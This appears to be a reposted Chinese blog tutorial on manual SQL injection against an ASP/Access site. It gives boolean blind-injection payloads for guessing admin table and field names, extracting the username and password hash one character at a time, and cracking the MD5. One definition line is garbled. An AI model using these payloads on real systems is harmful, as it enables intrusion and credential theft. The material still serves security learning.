博客
关于我
SQL注入access数据库
阅读量:669 次
发布时间:2019-03-16

本文共 914 字,大约阅读时间需要 3 分钟。

SQL注入是一种敏感的安全漏洞,通常通过未正确处理或过渡;++_operator来导致,允许攻击者执行恶意SQL命令。以下是一些手动操作SQL注入的步骤和技巧。

1. 检查注入可能性

首先,观察URL参数是否能够直接注入数据库。例如:

http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139

若返回正常响应(如1=1),则表明路径存在注入漏洞。

2. 猜测数据库表名

使用以下SQL语句猜测数据库表名:

and exists (select * from 表名)

替换表名为常见的管理员表名,如admina_adminx_admin等。

  • 如果存在该表名,页面返回正常,说明表名正确。
  • 如果返回错误,继续调整表名或尝试其他名称。

3. 猜测字段名称

逐步猜测字段名称,例如:

and exists (select 字段名 from 表名)

替换字段名为常见管理员字段,如adminpassword等。

  • 确认字段存在后,继续下一步骤。

4. 判断字段长度

测量字段长度,例如:

and (select top 1 len(字段) from 表名) > 0
  • 测试用户名字段长度:and (select top 1 len(admin) from admin) > 0
  • 测试密码字段长度:and (select top 1 len(password) from admin) > 0

这有助于确定字段的具体长度。

5. 分析ASCII码

逐一分析字符的ASCII码:

  • 使用以下SQL语句获取字符ASCII码值:
and (select top 1 asc(mid(字段, 1, 1)) from 表名) > 0
  • 逐步确定每个字符的ASCII码值。
  • 示例:用户_id为admin,密码逐步分析为a48e190fafc257d3

6. 密码解密

将获取到的密码哈希值解密。例如:

bendss

使用在线MD5解密工具仔细核对解密结果。

7. 总结

通过以上步骤,从SQL注入点逐步挖掘数据库结构,获取管理员账号和密码。记住,测试环境至关重要,避免对生产环境造成损害。

转载地址:http://vmnqz.baihongyu.com/

你可能感兴趣的文章
Objective-C实现最近点对问题(附完整源码)
查看>>
Objective-C实现最长公共子序列算法(附完整源码)
查看>>
Objective-C实现最长回文子串算法(附完整源码)
查看>>
Objective-C实现最长回文子序列算法(附完整源码)
查看>>
Objective-C实现最长子数组算法(附完整源码)
查看>>
Objective-C实现最长字符串链(附完整源码)
查看>>
Objective-C实现最长递增子序列算法(附完整源码)
查看>>
Objective-C实现有向图和无向加权图算法(附完整源码)
查看>>
Objective-C实现有序表查找算法(附完整源码)
查看>>
Objective-C实现有限状态机(附完整源码)
查看>>
Objective-C实现有限状态自动机FSM(附完整源码)
查看>>
Objective-C实现有限集上给定关系的自反关系矩阵和对称闭包关系矩阵(附完整源码)
查看>>
Objective-C实现服务程序自启动(附完整源码)
查看>>
Objective-C实现服务端客户端聊天室(附完整源码)
查看>>
Objective-C实现朴素贝叶斯算法(附完整源码)
查看>>
Objective-C实现杨氏3X3矩阵(附完整源码)
查看>>
Objective-C实现杰卡德距离算法(附完整源码)
查看>>
Objective-C实现极值距离算法(附完整源码)
查看>>
Objective-C实现极小极大算法(附完整源码)
查看>>
Objective-C实现构造n以内的素数表(附完整源码)
查看>>